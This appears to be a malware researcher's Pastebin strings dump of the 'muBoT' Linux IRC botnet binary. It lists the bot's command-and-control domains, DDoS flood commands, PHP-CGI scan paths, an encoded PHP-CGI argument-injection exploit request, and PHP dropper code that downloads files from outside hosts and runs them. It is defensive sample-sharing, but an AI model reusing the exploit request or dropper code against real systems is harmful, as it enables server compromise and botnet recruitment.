API tools faq
paste
Advertisement
MalwareMustDie

mubot SAMPLE | [httpd]

MalwareMustDie
Oct 4th, 2015
2,970
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Lua 15.04 KB | None | 0 0
raw download clone embed print report
  1. // mumubot sample of
  2.  
  3. Filename: httpd
  4. Size: 483328 bytes
  5. Type: ELF 64-bit LSB core file x86-64, version 1 (SYSV), SVR4-style, from '[httpd]'
  6. MD5: d4b2f42c48c7451942f33bc6316abe42
  7. SHA1 d0fa9eb98e8e625519892b6cd58695b632a3f0c6
  8.  
  9. sample
  10. [httpd]
  11. IGISCORE
  12. ELIFCORE
  13. /lib/x86_64-linux-gnu/libresolv-2.15.so
  14. /lib/x86_64-linux-gnu/libresolv-2.15.so
  15. /lib/x86_64-linux-gnu/libresolv-2.15.so
  16. /lib/x86_64-linux-gnu/libresolv-2.15.so
  17. /lib/x86_64-linux-gnu/libnss_dns-2.15.so
  18. /lib/x86_64-linux-gnu/libnss_dns-2.15.so
  19. /lib/x86_64-linux-gnu/libnss_dns-2.15.so
  20. /lib/x86_64-linux-gnu/libnss_dns-2.15.so
  21. /lib/libnss_mdns4_minimal.so.2
  22. /lib/libnss_mdns4_minimal.so.2
  23. /lib/libnss_mdns4_minimal.so.2
  24. /lib/libnss_mdns4_minimal.so.2
  25. /lib/x86_64-linux-gnu/libnss_files-2.15.so
  26. /lib/x86_64-linux-gnu/libnss_files-2.15.so
  27. /lib/x86_64-linux-gnu/libnss_files-2.15.so
  28. /lib/x86_64-linux-gnu/libnss_files-2.15.so
  29. /lib/x86_64-linux-gnu/libc-2.15.so
  30. /lib/x86_64-linux-gnu/libc-2.15.so
  31. /lib/x86_64-linux-gnu/libc-2.15.so
  32. /lib/x86_64-linux-gnu/libc-2.15.so
  33. /lib/x86_64-linux-gnu/ld-2.15.so
  34. /lib/x86_64-linux-gnu/ld-2.15.so
  35. /lib/x86_64-linux-gnu/ld-2.15.so
  36. /lib64/ld-linux-x86-64.so.2
  37. __gmon_start__
  38. libc.so.6
  39. socket
  40. strcpy
  41. strncmp
  42. __isoc99_sscanf
  43. connect
  44. strncpy
  45. listen
  46. select
  47. vsprintf
  48. getpid
  49. strdup
  50. strtok
  51. getppid
  52. calloc
  53. strlen
  54. memset
  55. __errno_location
  56. toupper
  57. inet_network
  58. inet_addr
  59. memcpy
  60. fclose
  61. setsockopt
  62. malloc
  63. strcasecmp
  64. gethostbyname
  65. pclose
  66. getcwd
  67. waitpid
  68. sendto
  69. accept
  70. strcmp
  71. __libc_start_main
  72. snprintf
  73. GLIBC_2.7
  74. GLIBC_2.2.5
  75. AUATSH
  76. [A\A]]
  77. fffff.
  78. ich-hab.sytes.net
  79. mummuu.proxy8080.com
  80. mumumu.duckdns.org
  81. NOTICE %s :Unable to comply.
  82. %s : USERID : UNIX : %s
  83. NOTICE %s :GET <host> <save as>
  84. NOTICE %s :Unable to create socket.
  85. http://
  86. NOTICE %s :Unable to resolve address.
  87. NOTICE %s :Unable to connect to http.
  88. GET /%s HTTP/1.0
  89. Connection: Keep-Alive
  90. User-Agent: Mozilla/4.75 [en] (X11; U; Linux 2.2.16-3 i686)
  91. Host: %s:80
  92. Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */*
  93. Accept-Encoding: gzip
  94. Accept-Language: en
  95. Accept-Charset: iso-8859-1,*,utf-8
  96. NOTICE %s :Receiving file.
  97. NOTICE %s :Saved as %s
  98. NOTICE %s :Removed all spoofs
  99. NOTICE %s :What kind of subnet address is that? Do something like: 169.40
  100. NOTICE %s :Unable to resolve %s
  101. NOTICE %s :UDP <target> <port> <secs>
  102. NOTICE %s :Packeting %s.
  103. NOTICE %s :SYNFLOOD <target> <port> <secs>
  104. NOTICE %s :Flooding with TCP SYN %s.
  105. NOTICE %s :NSSYNFLOOD <target> <port> <secs>
  106. NOTICE %s :RANDOMFLOOD <target> <port> <secs>
  107. NOTICE %s :Flooding with TCP SYN/ACK %s.
  108. NOTICE %s :ACKFLOOD <target> <port> <secs>
  109. NOTICE %s :Flooding with TCP ACK %s.
  110. NOTICE %s :NSACKFLOOD <target> <port> <secs>
  111. NOTICE %s :UNKNOWN <target> <secs>
  112. NOTICE %s :Unknowning %s.
  113. NOTICE %s :Spoofs: %d.%d.%d.%d
  114. NOTICE %s :Spoofs: %d.%d.%d.%d - %d.%d.%d.%d
  115. /cgi-bin/php
  116. /cgi-bin/php5
  117. /cgi-bin/php-cgi
  118. /cgi-bin/php.cgi
  119. /cgi-bin/php4
  120. /cgi-bin/php5-cgi
  121. /cgi-bin/php4-cgi
  122. /cgi-bin/php5.cgi
  123. /cgi-bin/php4.cgi
  124. /cgi-bin/php52.cgi
  125. /cgi-bin/php53.cgi
  126. /cgi-bin/
  127. /cgi-sys/php-cgi
  128. /cgi-bin/php5.cgi-20120725_by_SAKUR
  129. /cgi-bin/info.php
  130. /cgi-bin/php.fcgi
  131. /info.php
  132. /phpinfo.php
  133. /cgi-bin/phpinfo.php
  134. /phpMyAdmin/config/config.inc.php
  135. /phpmyadmin/config/config.inc.php
  136. POST %s?%%2D%%64+%%61%%6C%%6C%%6F%%77%%5F%%75%%72%%6C%%5F%%69%%6E%%63%%6C%%75%%64%%65%%3D%%6F%%6E+%%2D%%64+%%73%%61%%66%%65%%5F%%6D%%6F%%64%%65%%3D%%6F%%66%%66+%%2D%%64+%%73%%75%%68%%6F%%73%%69%%6E%%2E%%73%%69%%6D%%75%%6C%%61%%74%%69%%6F%%6E%%3D%%6F%%6E+%%2D%%64+%%64%%69%%73%%61%%62%%6C%%65%%5F%%66%%75%%6E%%63%%74%%69%%6F%%6E%%73%%3D%%22%%22+%%2D%%64+%%6F%%70%%65%%6E%%5F%%62%%61%%73%%65%%64%%69%%72%%3D%%6E%%6F%%6E%%65+%%2D%%64+%%61%%75%%74%%6F%%5F%%70%%72%%65%%70%%65%%6E%%64%%5F%%66%%69%%6C%%65%%3D%%70%%68%%70%%3A%%2F%%2F%%69%%6E%%70%%75%%74+%%2D%%64+%%63%%67%%69%%2E%%66%%6F%%72%%63%%65%%5F%%72%%65%%64%%69%%72%%65%%63%%74%%3D%%30+%%2D%%64+%%63%%67%%69%%2E%%72%%65%%64%%69%%72%%65%%63%%74%%5F%%73%%74%%61%%74%%75%%73%%5F%%65%%6E%%76%%3D%%22%%79%%65%%73%%22+%%2D%%64+%%63%%67%%69%%2E%%66%%69%%78%%5F%%70%%61%%74%%68%%69%%6E%%66%%6F%%3D%%31+%%2D%%64+%%61%%75%%74%%6F%%5F%%70%%72%%65%%70%%65%%6E%%64%%5F%%66%%69%%6C%%65%%3D%%70%%68%%70%%3A%%2F%%2F%%69%%6E%%70%%75%%74+%%2D%%6E HTTP/1.1
  137. Host: %s
  138. User-Agent: I'm a mu mu mu ?
  139. Content-Type: application/x-www-form-urlencoded
  140. Content-Length: %d
  141. Connection: close
  142. $tmp = sys_get_temp_dir();
  143. $path = getcwd();
  144. $file = "index.html";
  145. $url = "http://jappyupdate.servehttp.com";
  146. system("wget $url -P - -O" . $tmp . "/index.html");
  147. system("chmod -R 777" . $tmp ."/index.html");
  148. chmod ($tmp."/".$file,0777);
  149. system($tmp . "/index.html");
  150. $file2 = "index.htm";
  151. $url2 = "http://linuxupdatejappy.servepics.com";
  152. system("wget $url2 -P - -O" . $tmp . "/index.htm");
  153. system("chmod -R 777" . $tmp ."/index.htm");
  154. chmod ($tmp."/".$file2,0777);
  155. system($tmp . "/index.htm");
  156. echo $tmp;
  157. echo $path;
  158. die($tmp);
  159. NOTICE %s :[Apache / PHP 5.x Scan Running!!!]
  160. NOTICE %s :[Random Apache / PHP 5.x Scan Started]SUBNET[ %s ]THREADS[ %s ]TIME[ %s ]
  161. NOTICE %s :[WAITING OF THREADS]
  162. NOTICE %s :[SCAN DONE]
  163. %d.%d.%d.%d
  164. NOTICE %s : MINUS NULL CASE
  165. NOTICE %s :[Apache / PHP 5.x Scan RUNNING!!! Current IP:%s]
  166. NOTICE %s :[Apache / PHP 5.x SUBNETSCAN STARTED]SUBNET[ %s ]THREADS[ %s ]
  167. %s.%i.%i.%i
  168. NOTICE %s :[Apache / PHP 5.x RUNNING!!!]
  169. NOTICE %s :[Apache / PHP 5.x SUBNETSCAN B STARTED]SUBNET[ %s ]THREADS[ %s ]
  170. %s.%i.%i
  171. NOTICE %s :[Apache / PHP 5.x SUBNETSCAN C STARTED]SUBNET[ %s ]THREADS[ %s ]
  172. NOTICE %s :+-------------------+
  173. NOTICE %s :
  174. I'm a mu mu mu
  175. NOTICE %s :+---------?---------+
  176. NOTICE %s :muBoT Priv Version
  177. NOTICE %s :SCANRND <192 or 192.168 or 192.168.0> <threads> <minutes> = Random Scan
  178. NOTICE %s :SCANSUB <192.168> <threads> = Complete Subnet scan
  179. NOTICE %s :UPDATE <host> <bin>
  180. NOTICE %s :THX = THX to
  181. NOTICE %s :FUCKERS = About fuckers
  182. NOTICE %s :muBoT says Thanks to.....
  183. NOTICE %s :-->Lioba aka Gohan<--: MENTAL,TECHNICAL,HELP
  184. NOTICE %s :-->Dr. Simone Luchetta<--source attacks are almost completly rewrited by Dr.Simone Luchetta.....
  185. NOTICE %s :-->Helel Ben-Shachar<-- The Shining One, Son of the Dawn!
  186. NOTICE %s :........There are presents: ackflood, the infamous nsackflood, an improved.......
  187. NOTICE %s :.......version of synflood and others (like randomflood)
  188. NOTICE %s :......puts me in the psychiatry but BoSSaLiNiE is the new hope
  189. NOTICE %s :muBoT says Fuck You !!! To.....
  190. NOTICE %s :Firewire2002 You Ass Fucked By Youe Daddy Piss Head
  191. NOTICE %s :Fuck You To byte You Damn Shit Nugget
  192. 5.1FiX-64bit
  193. NOTICE %s muBoT %s Helel mod 1.0 - Ezba' Elohim + muBoT Apache PHP Exploit
  194. NOTICE %s :NICK <nick>
  195. NOTICE %s :Nick cannot be larger than 9 characters.
  196. NICK %s
  197. NOTICE %s :MOVE <server>
  198. NOTICE %s :Killing pid %d.
  199. RANDOMFLOOD
  200. NSACKFLOOD
  201. NSSYNFLOOD
  202. ACKFLOOD
  203. SYNFLOOD
  204. UNKNOWN
  205. SERVER
  206. GETSPOOFS
  207. SPOOFS
  208. VERSION
  209. KILLALL
  210. FUCKERS
  211. SCANRNDAPE
  212. SCANSUBAPE
  213. SCANSUBAPEB
  214. SCANSUBAPEC
  215. export PATH=/bin:/sbin:/usr/bin:/usr/local/bin:/usr/sbin;%s
  216. NOTICE %s :%s
  217. MODE %s -xi
  218. JOIN %s :%s
  219. WHO %s
  220. PONG %s
  221. NOTICE %s :I'm having a problem resolving my host, someone will have to SPOOFS me manually.
  222. PRIVMSG
  223. /etc/init.d/rc.local
  224. /etc/rc.conf
  225. "%s%s"
  226. [httpd]
  227. priv11
  228. NICK %s
  229. USER %s localhost localhost :%s
  230. NOTICE #mumu :[Random Apache / PHP 5.x Scan Started]SUBNET[ 200 ]THREADS[ 300 ]TIME[ 10 ]
  231. /lib64
  232. nux-x86-
  233. .X_v/n
  234. __gmon_staro
  235. cketom
  236. htRs"rand
  237. fopen;ncmp
  238. wa<|ih9
  239. vvWldrk ime
  240. ?vsprint`p
  241. killudup
  242. vfeoHgf
  243. v/addr)sp`
  244. m3h`tbyna
  245. ^oh>nuf
  246. 7&GLIBC_2.7
  247. mumu|SBDFCGBOLFEQ
  248. mumu|JXIJCLXQMRHO
  249. mumu|NZQPQDUUWYZE
  250. ff02::2
  251. ip6-allrouters
  252. -loopback
  253. ich-hab.sytes.net
  254. ich-hab.sytes.net
  255. /lib/x86_64-linux-gnu/libnss_files.so.2
  256. /lib/libnss_mdns4_minimal.so.2
  257. libnss_mdns4_minimal.so.2
  258. /lib/x86_64-linux-gnu
  259. libnss_files.so.2
  260. passwd
  261. compat
  262. compat
  263. shadow
  264. compat
  265. mdns4_minimal
  266. networks
  267. protocols
  268. services
  269. ethers
  270. netgroup
  271. libnss_files.so.2
  272. libnss_mdns4_minimal.so.2
  273. /lib/x86_64-linux-gnu/libnss_dns.so.2
  274. libnss_dns.so.2
  275. /lib/x86_64-linux-gnu
  276. libnss_dns.so.2
  277. /lib/x86_64-linux-gnu/libresolv.so.2
  278. libresolv.so.2
  279. /lib/x86_64-linux-gnu
  280. libresolv.so.2
  281. __gmon_start__
  282. __cxa_finalize
  283. _Jv_RegisterClasses
  284. __resp
  285. __res_hnok
  286. __ns_name_unpack
  287. __ns_name_ntop
  288. __ns_get16
  289. __ns_get32
  290. __p_type
  291. __p_class
  292. syslog
  293. __dn_expand
  294. __res_dnok
  295. mempcpy
  296. strlen
  297. strcasecmp
  298. memcpy
  299. __res_maybe_init
  300. memcmp
  301. __libc_res_nquery
  302. h_errno
  303. sprintf
  304. strchr
  305. __libc_res_nsearch
  306. __res_hostalias
  307. _nss_dns_gethostbyname2_r
  308. _nss_dns_gethostbyname_r
  309. _nss_dns_gethostbyaddr_r
  310. _nss_dns_gethostbyname3_r
  311. _nss_dns_gethostbyaddr2_r
  312. __dn_skipname
  313. __ctype_b_loc
  314. __ctype_tolower_loc
  315. _nss_dns_getnetbyname_r
  316. _nss_dns_getnetbyaddr_r
  317. _nss_dns_getcanonname_r
  318. libresolv.so.2
  319. libc.so.6
  320. libnss_dns.so.2
  321. GLIBC_PRIVATE
  322. GLIBC_2.3
  323. GLIBC_2.14
  324. GLIBC_2.2.5
  325. ATSub$
  326. .shstrtab
  327. .note.gnu.build-id
  328. .note.ABI-tag
  329. .gnu.hash
  330. .dynsym
  331. .dynstr
  332. .gnu.version
  333. .gnu.version_d
  334. .gnu.version_r
  335. .rela.dyn
  336. .rela.plt
  337. .rodata
  338. .interp
  339. .eh_frame_hdr
  340. .eh_frame
  341. .ctors
  342. .dtors
  343. .dynamic
  344. .got.plt
  345. .gnu_debuglink
  346. __gmon_start__
  347. __cxa_finalize
  348. _Jv_RegisterClasses
  349. __assert_fail
  350. socket
  351. connect
  352. fdopen
  353. __stack_chk_fail
  354. __fprintf_chk
  355. fflush
  356. fclose
  357. strcspn
  358. inet_pton
  359. inet_ntop
  360. strncpy
  361. strlen
  362. strcasecmp
  363. _nss_mdns4_minimal_gethostbyname2_r
  364. strcpy
  365. memcpy
  366. _nss_mdns4_minimal_gethostbyname_r
  367. _nss_mdns4_minimal_gethostbyaddr_r
  368. __strdup
  369. libc.so.6
  370. libnss_mdns4_minimal.so.2
  371. NSSMDNS_0
  372. GLIBC_2.3.4
  373. GLIBC_2.4
  374. GLIBC_2.2.5
  375. ATSubH
  376. /avahi-dH
  377. /var/runH
  378. aemon/soH
  379. T$xdH3
  380. /build/buildd/nss-mdns-0.10/src/util.c
  381. fd >= 0
  382. set_cloexec
  383. RESOLVE-HOSTNAME%s %s
  384. RESOLVE-ADDRESS %s
  385. /build/buildd/nss-mdns-0.10/src/nss.c
  386. ipv4 && userdata
  387. suffix
  388. .local
  389. .local.
  390. u.data.name[0]
  391. verify_name_allowed
  392. ipv4_callback
  393. ends_with
  394. _nss_mdns4_minimal_gethostbyaddr_r
  395. imal.so.2
  396. .shstrtab
  397. .note.gnu.build-id
  398. .gnu.hash
  399. .dynsym
  400. .dynstr
  401. .gnu.version
  402. .gnu.version_d
  403. .gnu.version_r
  404. .rela.dyn
  405. .rela.plt
  406. .rodata
  407. .eh_frame_hdr
  408. .eh_frame
  409. .ctors
  410. .dtors
  411. .dynamic
  412. .got.plt
  413. .gnu_debuglink
  414. "[1=/Z
  415. /etc/passwd
  416. /etc/group
  417. /etc/hosts
  418. /etc/resolv.conf
  419. /etc/services
  420. /etc/netgroup
  421. aliases
  422. ethers
  423. initgroups
  424. netgroup
  425. networks
  426. passwd
  427. protocols
  428. publickey
  429. services
  430. shadow
  431. )iuL)s
  432. usga.ibm.com
  433. /lib/x86_64-linux-gnu/libc.so.6
  434. libc.so.6
  435. /lib/x86_64-linux-gnu
  436. libc.so.6
  437. _rtld_global
  438. _dl_make_stack_executable
  439. __libc_stack_end
  440. __libc_memalign
  441. malloc
  442. _dl_deallocate_tls
  443. __libc_enable_secure
  444. __tls_get_addr
  445. _dl_get_tls_static_info
  446. calloc
  447. _dl_debug_state
  448. _dl_argv
  449. _dl_allocate_tls_init
  450. _rtld_global_ro
  451. realloc
  452. _dl_tls_setup
  453. _dl_rtld_di_serinfo
  454. _dl_mcount
  455. _dl_allocate_tls
  456. _r_debug
  457. ld-linux-x86-64.so.2
  458. GLIBC_2.2.5
  459. GLIBC_2.3
  460. GLIBC_2.4
  461. GLIBC_PRIVATE
  462. linux-vdso.so.1
  463. tls/x86_64/
  464. ich-hab.sytes.net.
  465. ich-hab.sytes.net.
  466. search usga.ibm.com
  467. FILE BY HAND -- YOUR CHANGES WILL BE OVERWRITTEN
  468. sga.ibm.com
  469. ich-hab
  470. ich-hab.sytes.net
  471. ich-hab
  472. ich-hab.sytes.net
  473. ich-hab
  474. ich-hab2
  475. scanrndape
  476. PRIVMSG
  477. eleet@localhost
  478. muJXIJC@129.42.208.174
  479. scanrndape 200 300 10
  480. 300 10
  481. scanrndape 200 300 10
  482. BOLFEOLFEQ @ #mumu :mumu|SBDFCGBOLFEQ ~mumu
  483. BOLFEQ ~mumu
  484. mumu|SBDFCGEOLFEQ #mumu :End of /NAMES list.
  485. /NAMES list.
  486. mumu|SBDFCGEOLFEQ #mumu ~mumuJXIJC 129.42.208.174 irc.mumu.net mumu|SBDFCGBOLFEQ H :0 mumu|NZQPQDUUWYZE
  487. |NZQPQDUUWYZE
  488. mumu|SBDFCGBOLFEQ mumu|SBDFCGBOLFEQ :End of /WHO list.
  489. of /WHO list.
  490. 189, max 194
  491. mumu|SBDFCGBOLFEQ 189 194 :Current global users 189, max 194
  492. 189, max 194
  493. mumu|SBDFCGBOLFEQ :MOTD File is missing
  494. le is missing
  495. mumDFCGBOLFEOLFEQ :Your username mumu|JXIJC contained the invalid chad has been cha to mumuJXIJC. Po mumuJXIJC.IJC. Please use only the characters 0-9 a-z A-Z _ - or . in your username. Your username is the part before the @ in your email address.
  496. mail address.
  497. mumu|SBOLFEBOLFEQ :+iwx
  498. SBDFCGBOLFEQ :+iwx
  499. STATUSMSG=~&@%+ :are supported by this server
  500. y this server
  501. mumuFCGBOLFEOLFEQ EXCEPTS INVEX CMDS=KNOCK,MAP,DCCALLOW,USERIP,STARTTLS :are supported by this server
  502. y this server
  503. /home/brian/Dropbox/malware
  504. =/home/brian/Dropbox/malware/sample
  505. x86_64
  506. [httpd]
  507. SSH_AGENT_PID=1968
  508. GPG_AGENT_INFO=/tmp/keyring-fYwH3J/gpg:0:1
  509. TERM=xterm
  510. SHELL=/bin/bash
  511. XDG_SESSION_COOKIE=1130ef24358930bb023e23b100000006-1405017343.524544-1610205955
  512. WINDOWID=77634816
  513. GNOME_KEYRING_CONTROL=/tmp/keyring-fYwH3J
  514. USER=brian
  515. LS_COLORS=rs=0:di=01;34:ln=01;36:mh=00:pi=40;33:so=01;35:do=01;35:bd=40;33;01:cd=40;33;01:or=40;31;01:su=37;41:sg=30;43:ca=30;41:tw=30;42:ow=34;42:st=37;44:ex=01;32:*.tar=01;31:*.tgz=01;31:*.arj=01;31:*.taz=01;31:*.lzh=01;31:*.lzma=01;31:*.tlz=01;31:*.txz=01;31:*.zip=01;31:*.z=01;31:*.Z=01;31:*.dz=01;31:*.gz=01;31:*.lz=01;31:*.xz=01;31:*.bz2=01;31:*.bz=01;31:*.tbz=01;31:*.tbz2=01;31:*.tz=01;31:*.deb=01;31:*.rpm=01;31:*.jar=01;31:*.war=01;31:*.ear=01;31:*.sar=01;31:*.rar=01;31:*.ace=01;31:*.zoo=01;31:*.cpio=01;31:*.7z=01;31:*.rz=01;31:*.jpg=01;35:*.jpeg=01;35:*.gif=01;35:*.bmp=01;35:*.pbm=01;35:*.pgm=01;35:*.ppm=01;35:*.tga=01;35:*.xbm=01;35:*.xpm=01;35:*.tif=01;35:*.tiff=01;35:*.png=01;35:*.svg=01;35:*.svgz=01;35:*.mng=01;35:*.pcx=01;35:*.mov=01;35:*.mpg=01;35:*.mpeg=01;35:*.m2v=01;35:*.mkv=01;35:*.webm=01;35:*.ogm=01;35:*.mp4=01;35:*.m4v=01;35:*.mp4v=01;35:*.vob=01;35:*.qt=01;35:*.nuv=01;35:*.wmv=01;35:*.asf=01;35:*.rm=01;35:*.rmvb=01;35:*.flc=01;35:*.avi=01;35:*.fli=01;35:*.flv=01;35:*.gl=01;35:*.dl=01;35:*.xcf=01;35:*.xwd=01;35:*.yuv=01;35:*.cgm=01;35:*.emf=01;35:*.axv=01;35:*.anx=01;35:*.ogv=01;35:*.ogx=01;35:*.aac=00;36:*.au=00;36:*.flac=00;36:*.mid=00;36:*.midi=00;36:*.mka=00;36:*.mp3=00;36:*.mpc=00;36:*.ogg=00;36:*.ra=00;36:*.wav=00;36:*.axa=00;36:*.oga=00;36:*.spx=00;36:*.xspf=00;36:
  516. LIBGL_DRIVERS_PATH=/usr/lib/fglrx/dri:/usr/lib32/fglrx/dri
  517. XDG_SESSION_PATH=/org/freedesktop/DisplayManager/Session0
  518. XDG_SEAT_PATH=/org/freedesktop/DisplayManager/Seat0
  519. SSH_AUTH_SOCK=/tmp/keyring-fYwH3J/ssh
  520. SESSION_MANAGER=local/swarmhost:@/tmp/.ICE-unix/1931,unix/swarmhost:/tmp/.ICE-unix/1931
  521. DEFAULTS_PATH=/usr/share/gconf/ubuntu.default.path
  522. XDG_CONFIG_DIRS=/etc/xdg/xdg-ubuntu:/etc/xdg
  523. PATH=/home/brian/bin:/usr/lib/lightdm/lightdm:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games
  524. DESKTOP_SESSION=ubuntu
  525. PWD=/home/brian/Dropbox/malware
  526. GNOME_KEYRING_PID=1920
  527. LANG=en_US.UTF-8
  528. MANDATORY_PATH=/usr/share/gconf/ubuntu.mandatory.path
  529. UBUNTU_MENUPROXY=libappmenu.so
  530. COMPIZ_CONFIG_PROFILE=ubuntu
  531. GDMSESSION=ubuntu
  532. SHLVL=1
  533. HOME=/home/brian
  534. GNOME_DESKTOP_SESSION_ID=this-is-deprecated
  535. LOGNAME=brian
  536. XDG_DATA_DIRS=/usr/share/ubuntu:/usr/share/gnome:/usr/local/share/:/usr/share/
  537. DBUS_SESSION_BUS_ADDRESS=unix:abstract=/tmp/dbus-sGR7CzdjCs,guid=2315eafd1e73f23525b0725b0000001d
  538. LESSOPEN=| /usr/bin/lesspipe %s
  539. DISPLAY=:0
  540. XDG_CURRENT_DESKTOP=Unity
  541. LESSCLOSE=/usr/bin/lesspipe %s %s
  542. COLORTERM=gnome-terminal
  543. XAUTHORITY=/home/brian/.Xauthority
  544. _=./sample
  545. OLDPWD=/home/brian/Dropbox
  546. ./sample
  547. __vdso_clock_gettime
  548. __vdso_gettimeofday
  549. __vdso_time
  550. __vdso_getcpu
  551. linux-vdso.so.1
  552. LINUX_2.6
  553. /build/buildd/linux-lts-saucy-3.11.0/arch/x86/vdso/vclock_gettime.c
  554. A\A]H9
  555. [A\A]]
  556. [A\A]]
  557. [A\A]]
  558. AUATSH
  559. [A\A]]
  560. GCC: (Ubuntu/Linaro 4.6.3-1ubuntu5) 4.6.3
  561. .shstrtab
  562. .dynsym
  563. .dynstr
  564. .gnu.version
  565. .gnu.version_d
  566. .eh_frame_hdr
  567. .eh_frame
  568. .dynamic
  569. .rodata
  570. __bug_table
  571. .discard
  572. .altinstructions
  573. .altinstr_replacement
  574. .comment
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!